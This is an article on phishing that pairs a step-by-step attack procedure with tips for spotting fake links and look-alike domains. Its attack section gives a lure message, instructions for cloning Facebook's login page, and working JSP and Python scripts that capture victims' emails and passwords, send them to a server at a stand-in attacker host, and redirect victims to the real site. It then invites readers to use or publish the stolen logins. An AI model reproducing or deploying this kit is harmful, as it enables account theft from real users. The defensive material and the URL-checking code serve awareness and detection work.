
Cyber Security Phishing Attack and Defense

Sisay A. Chala

In this article, I will try to show how phishing, a technique that lures users into providing information to
an unintended recipient, is launched and how to defend yourself against such an attack.

A few days ago, I received a WhatsApp message from a friend. As shown in Figure 7, the message (in
German) states that my friend won a voucher worth 250 and that I should also click the given link to get a
voucher of the same value. Then I decided to share my thoughts. I hope that reading through this article helps
you tell whether a message you receive is genuine or not.

Warning!
At the end of this article, I hope that the reader is able to apply phishing to hack a target user.
However, it is important to note that hacking is a crime! This material is solely aimed at sharing
knowledge for academic purposes, with the intention of informing readers how to defend against
phishing attacks. The author will not bear any direct (or implied) responsibility for damages to you
or to the user you attack. Try it at your own risk!

I. What is Phishing?
Phishing is the process by which a user is tricked into providing information to attackers. Phishers
use email, telephone or messages to entice, scare or urge a user into giving away personal
details, credit card numbers, user names and passwords or any other private information. The
commonest phishing attack happens when a user receives an email (or other form of message) that
promises the user something appealing and tricks them into clicking a link that is claimed to be
reputable but that takes the user to a website controlled by the criminal. For example, the user may
be given a link that the attacker claims is the bank's website, but the link takes the user to another address.
The attackers use techniques called social engineering that exploit the user's ego, fear or greed to trick
them. They may come in the form of financial promises, travel promises, system update
warnings, etc. In a nutshell, a phishing attack is, in most cases, an attack launched with the help of
the victim.
Attackers may also use malicious software embedded in websites, pirated software, images,
etc. that runs on the system without the user's awareness. Such software may capture everything
the user types, take screenshots or even photograph the user through the webcam and transfer this
information to the attacker. It may also force the user's browser to open the phishing site, where
the user will give away private information.
Reports by the Anti-Phishing Working Group show that phishing is growing at an alarming rate
and that in the first quarter of 2016 alone it grew by 250% [i].

II. Purpose of this Article


The purpose of this article is to show one of the many ways of phishing and how a phishing attack
works, with an example use case. It also provides tips on how a phishing attack can be launched on a
target user and on ways to defend yourself in the likely event of being a target.

[i] http://docs.apwg.org/reports/apwg_trends_report_q1_2016.pdf

This article helps users increase their security awareness while using the Internet by:
1. helping users understand the risk of clicking a link in relation to phishing attacks,
2. advising users to be cautious of the links they see in messages, emails and other content
they receive before opening them,
3. advising users to be cautious of the web pages they browse and the URLs to which they are
redirected,
4. showing some tricks used by hackers to circumvent users' caution with URL names
and personalized messages,
5. showing those who aspire to be security professionals how easily phishing can be
performed.

III. Step-by-step Procedure:

Figure 1: Workflow of Phishing Attack

The phishing workflow shown in Figure 1 is described in the following six
steps:

1) Prepare content that appeals to the user or urges them to act. See the following example:
Dear Mr. Gullible User,
I have been following your posts on facebook. The points you have been
raising are very interesting.
.
.
.
I want to follow in your footsteps and write a few posts on a regular basis. I
have written my first post, which I think is interesting for you too. As I
would like to get your insightful advice, can you please spare a little
of your precious time to see my post and give me your feedback?
Click here to get to the post.

Thank you in advance.

Yours sincerely,
Naughty Guy
2) Now prepare the fake web page that looks exactly like the actual web page, Facebook [ii] in
this case. The target user is sent the above message with a link directing them to this
fake web page, which is controlled by the criminal. The criminal may have written code to
redirect the user to the actual web page after capturing what they want, in which case the user
may not even notice what happened in between.

[ii] There is no intention to take Facebook as a target; it is used only as an example because it is used by many users.

To create a fake web page that looks exactly like the actual page, the easy shortcut is to
save the actual page and edit the part of the code that communicates with the server-side
application. In this example, let us save the Facebook front page and edit that part of the code.

Figure 1: Look-and-feel of the Facebook page

Now right-click on the page, choose View Page Source from the menu that appears and
search the source for the text action= to get to the following.

Figure 2: part of code that sends to server-side application

This is the part of the code that sends the user name (i.e., email or phone in the case of
Facebook) and the password to the server-side application.
All you need to do to redirect the user's information is to replace the URL
https://www.facebook.com/login.php?login_attempt=1&lwv=110 with the URL of your own
capture script, which we will create in step 3.
Now save the modified page on your server (or upload it to a hosting site; but be
careful, most hosting sites do not allow phishing!), put the link to the new file into the
message you created in step 1 and get ready to send it to the victim.

3) Now create the server-side application that captures the user inputs from the fake page we
created in step 2, saves them and redirects the user to the actual Facebook site, which then
verifies the password for real. To do that, you need the names of the two form fields that hold
the email and password on the web page. In the page source you obtained in step 2, just near
where you edited the value of action, you will find two input elements for email and
password with name=email and name=pass, respectively. Use these names in the
server-side application code.

Figure 3: User name field

Figure 4: Password field

Here is example code in Java Server Pages (JSP) for a server-side application that captures the form
inputs. The redirect is issued before any page content is written, so the page emits no HTML of its own.
<%@ page import="java.io.*" %>
<%@ page import="javax.servlet.http.*" %>
<%
    // Field names copied from the saved Facebook page (see Figures 3 and 4)
    String email_input = request.getParameter("email");
    String pass_input = request.getParameter("pass");

    // Append the captured values to data.txt inside the web application directory
    String file = application.getRealPath("/data.txt");
    FileWriter filewriter = new FileWriter(file, true);
    filewriter.write("<B>Email: </B>" + email_input + "<BR>");
    filewriter.write("<B>Password: </B>" + pass_input + "<BR><BR>\n");
    filewriter.close();

    // Send the user on to the real site so that nothing looks out of place
    String redirectURL = "http://www.facebook.com";
    response.sendRedirect(redirectURL);
    return;
%>

4) Upload the files to the web server. Make sure that on your server (or in the folder on the hosting
site [iii]) you have two files: one facing the user (i.e., the Facebook look-alike page) that you created in
step 2 and the server-side application that you created in step 3. Now update the
message you created in step 1 so that the link (the one you want the user to click) points to
the fake page you saved.

5) Now you are ready to send the message to the user and launch the phishing attack. Send the
message and watch the content of the file that the server-side application creates.

6) The last step is to use the data collected. Did you want to use the login information to get
access to their accounts? Did you want to publish account information on websites and make
the news? :-) That is up to you!
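The whole procedure above, carried out in Python as an added example (this is not code from the article, whose own capture script is the JSP in step 3): the script finds the form target and field names in a saved login page (step 2), rewrites the action to point at the capture server, parses what the victim posts and bounces them to the real site (step 3). SAVED_PAGE is a constructed, much-shortened stand-in for the saved page, http://attacker.example/capture is a hypothetical capture URL, and the listening port 8080 is an assumption.

```python
# Added example for steps 2 and 3 of the procedure (not part of the article):
# clone the form of a saved login page, point it at a capture URL, and parse
# what the victim submits. SAVED_PAGE is a constructed stand-in for the page
# saved in step 2; attacker.example is a hypothetical host.
import re
from html.parser import HTMLParser
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs

SAVED_PAGE = """<html><body>
<form id="login_form" action="https://www.facebook.com/login.php?login_attempt=1&amp;lwv=110" method="post">
  <input type="email" name="email" id="email" placeholder="Email or Phone">
  <input type="password" name="pass" id="pass" placeholder="Password">
  <input type="hidden" name="lsd" value="AVq1xyz">
  <input type="submit" value="Log In">
</form></body></html>"""

CAPTURE_URL = "http://attacker.example/capture"   # hypothetical server from step 3
REAL_SITE = "https://www.facebook.com/"


class _FormScanner(HTMLParser):
    """Collects the action and the input names of every form on the page
    (the same information found by searching the source for action= in step 2)."""

    def __init__(self):
        super().__init__()
        self.forms = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append({"action": a.get("action", ""), "fields": []})
        elif tag == "input" and self.forms and a.get("name"):
            self.forms[-1]["fields"].append(a["name"])


def scan_forms(html):
    """Return [{"action": ..., "fields": [...]}, ...] for the forms in html."""
    scanner = _FormScanner()
    scanner.feed(html)
    return scanner.forms


_FORM_ACTION = re.compile(r'(<form\b[^>]*?\baction=")([^"]*)(")', re.I)


def rewrite_form_action(html, must_contain, new_action):
    """Step 2: replace the action of the one form whose target contains
    must_contain (e.g. 'login.php') with new_action; nothing else on the
    page is touched, so it still looks identical to the original."""
    hits = []

    def swap(m):
        if must_contain not in m.group(2):
            return m.group(0)
        hits.append(m.group(2))
        return m.group(1) + new_action + m.group(3)

    out = _FORM_ACTION.sub(swap, html)
    if len(hits) != 1:
        raise ValueError(f"expected exactly one matching form, found {len(hits)}")
    return out


def parse_submission(body, fields=("email", "pass")):
    """Step 3: pull the named fields out of a urlencoded POST body."""
    values = parse_qs(body, keep_blank_values=True)
    return {name: values.get(name, [""])[0] for name in fields}


def format_record(creds):
    """One line per victim, in the same spirit as the JSP's data.txt."""
    return "\t".join(f"{k}={v}" for k, v in creds.items()) + "\n"


class CaptureHandler(BaseHTTPRequestHandler):
    """Python equivalent of the JSP: log the credentials, then redirect the
    user to the real site so the failed login looks like a typo."""
    log_path = "data.txt"

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        body = self.rfile.read(length).decode("utf-8", "replace")
        with open(self.log_path, "a", encoding="utf-8") as log:
            log.write(format_record(parse_submission(body)))
        self.send_response(302)
        self.send_header("Location", REAL_SITE)
        self.end_headers()


if __name__ == "__main__":
    fake_page = rewrite_form_action(SAVED_PAGE, "login.php", CAPTURE_URL)
    with open("index.html", "w", encoding="utf-8") as f:
        f.write(fake_page)
    print("fields to capture:", scan_forms(fake_page)[0]["fields"])
    HTTPServer(("127.0.0.1", 8080), CaptureHandler).serve_forever()
```

Running the script writes the rewritten page to index.html and starts the capture handler; the rewrite deliberately fails if the page contains zero or several forms with the given target, because replacing the wrong one would silently break the lure.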

IV. Defense Against Phishing - Some Tips


As stated earlier in this article, phishing is a kind of cyber attack that is launched mostly with the
help of the victim! So the victim can drastically reduce the risk of a phishing attack just by refraining
from responding to requests that urge him/her to click a link or enter data.
The defense against phishing depends on the type of phishing that is launched. As we have
seen in the section above, understanding some of the tricks used by hackers helps reduce the risk
of becoming a victim. The following are some of the things to note in order to tell whether
a phishing attempt is under way.

Don't be tempted by offers that are too good to be true. Always remember that there is NO
FREE MONEY!

Do not rush to act when you receive a message that urges you to take action. Check,
check, check the URL, search for the content on the Internet and only then act, if you have to.

Attackers try to make the page's look-and-feel near perfect so that the user does not doubt it at
first glance, e.g., they save the target web page and modify the value of action in the form, as
shown in step 2 above. The page then looks exactly like the original one.

Attackers may use company logos so that you trust the source. Don't use a logo to verify
authenticity!

Attackers try to make the URL look similar to the original one by renting a domain name
with a similar typography. For example, to target www.facebook.com, they can rent
domains such as www.face6ook.com, www.facehook.com or www.facedook.com.

Note that when you hover your mouse pointer over a link, you will see its real URL in the
status bar of your browser. If the address shown in the link text differs from the
one in the status bar (compare Figures 5 and 6), NEVER click that link, even if you
trust the source!

[iii] One of the many hosting sites is http://www.000webhost.com


Figure 5: Given address different from real address (annotations in the figure: Address bar, Check URL)

In the email that contains the link, attackers try to make sure the message looks
natural. To do this, they first study the target user: his/her interactions, needs, activities,
connections, and so on. You can find examples of such emails on anti-social-engineering websites such as
Hoax-Slayer [iii]. For example, your Facebook status updates give them a lot of information with which to
craft a personalized message that you (or your friends or relatives) will believe and be fooled by.

Figure 6: Given address same as real address (annotations in the figure: Address bar, Check URL)


Read URLs in reverse. When you read a URL, start from the root (i.e., com, net, org, etc.) and
work leftwards: the name directly to the left of the root is the one that matters, and everything
further left is just a sub-domain the attacker chooses freely. Check that this name belongs to the
legitimate site you know. For example, www.google.myfakegoogle.com is not Google's site! In the
message I received (see Figure 7), the domain is not lidl.de; rather it is de-guscheine250.com.

[iii] http://www.hoax-slayer.com/
Figure 7: Whatsapp message offering a voucher worth 250

Because attackers may trick your friends/colleagues into sending you the message, it is wise to
trust your instinct when a message has something suspicious about it, irrespective of
whether you know (and trust) the sender.
Remember: NO credible company asks you to provide personal information via email.
Most of all, NO company asks you for your password!
If you notice any of the above (or anything else suspicious), be cautious. The baseline is to
always remember that there is NO FREE MONEY!
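The three URL checks from the tips above (reading a URL in reverse to find the domain that matters, spotting look-alike domains such as www.face6ook.com, and comparing a link's visible text with its real target as in Figures 5 and 6) as an added example in Python; this is not code from the article. PUBLIC_SUFFIXES is an assumed, trimmed stand-in for the public suffix list, the homoglyph table is an assumption built from the examples in the text, and SAMPLE_EMAIL is a constructed HTML snippet.

```python
# Added example for the URL tips in section IV (not code from the article):
# read a URL 'in reverse' to find the registrable domain, spot look-alike
# domains such as face6ook.com, and catch links whose visible text differs
# from their real target (the Figure 5 case). PUBLIC_SUFFIXES is an assumed,
# trimmed stand-in for the public suffix list; SAMPLE_EMAIL is constructed.
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

PUBLIC_SUFFIXES = {"com", "net", "org", "de", "co.uk"}

# Visual substitutions from the text (face6ook, facehook, facedook) plus other
# common ones (assumed list); applied to both sides before comparing labels.
HOMOGLYPHS = {"0": "o", "1": "l", "3": "e", "5": "s", "6": "b", "8": "b",
              "h": "b", "d": "b", "rn": "m", "vv": "w"}


def host_of(url):
    """Host name of a URL or bare host, lower-cased, without a trailing dot."""
    if "://" not in url:
        url = "http://" + url
    return (urlparse(url).hostname or "").lower().rstrip(".")


def registrable_domain(url):
    """The label directly left of the public suffix: lidl.de, myfakegoogle.com.
    Everything further left is a sub-domain the attacker chooses freely."""
    labels = host_of(url).split(".")
    for n in (2, 1):                      # try co.uk-style suffixes first
        if len(labels) > n and ".".join(labels[-n:]) in PUBLIC_SUFFIXES:
            return ".".join(labels[-(n + 1):])
    return ".".join(labels)


def normalise(label):
    """Fold homoglyphs so that face6ook and facebook compare equal."""
    out = label
    for fake, real in HOMOGLYPHS.items():
        out = out.replace(fake, real)
    return out


def edit_distance(a, b):
    """Plain Levenshtein distance, enough to catch one-character swaps."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify_domain(url, expected):
    """'genuine', 'lookalike' or 'unrelated' with respect to the site the
    message claims to come from."""
    got, want = registrable_domain(url), registrable_domain(expected)
    if got == want:
        return "genuine"
    g_label, w_label = got.split(".")[0], want.split(".")[0]
    if normalise(g_label) == normalise(w_label) or edit_distance(g_label, w_label) <= 1:
        return "lookalike"
    if w_label in host_of(url):           # brand buried in a sub-domain
        return "lookalike"
    return "unrelated"


class _AnchorCollector(HTMLParser):
    """(href, visible text) for every <a> in an HTML mail body."""

    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href") or "", []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def mismatched_links(html):
    """Links whose visible text is a URL on a different registrable domain
    than the real href: what you read is not where you go."""
    p = _AnchorCollector()
    p.feed(html)
    return [(text, href) for href, text in p.links
            if re.match(r"^(https?://|www\.)", text)
            and registrable_domain(text) != registrable_domain(href)]


SAMPLE_EMAIL = """<p>Click <a href="http://www.face6ook.com/login">https://www.facebook.com/</a>
to see the post, or use <a href="https://www.facebook.com/">https://www.facebook.com/</a>.</p>"""

if __name__ == "__main__":
    for url, expected in [("https://www.facebook.com/login.php", "facebook.com"),
                          ("http://www.face6ook.com", "facebook.com"),
                          ("http://www.google.myfakegoogle.com", "google.com"),
                          ("http://de-guscheine250.com", "lidl.de")]:
        print(url, "->", registrable_domain(url), classify_domain(url, expected))
    print(mismatched_links(SAMPLE_EMAIL))
```

The homoglyph folding is deliberately applied to both the suspect and the expected label, so a brand that itself contains one of the swapped characters still compares equal to itself; a production check would use the full public suffix list and a larger confusables table, but the logic stays the same.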

V. Conclusion
This article briefly discusses one of the commonest cyber attacks, the phishing attack, and provides a
step-by-step procedure for implementing and executing it. The article also highlights
methods used by criminals to lure victims to an unintended website. It concludes by providing tips
for avoiding these attacks.

Further Reading
http://computer.howstuffworks.com/phishing.htm
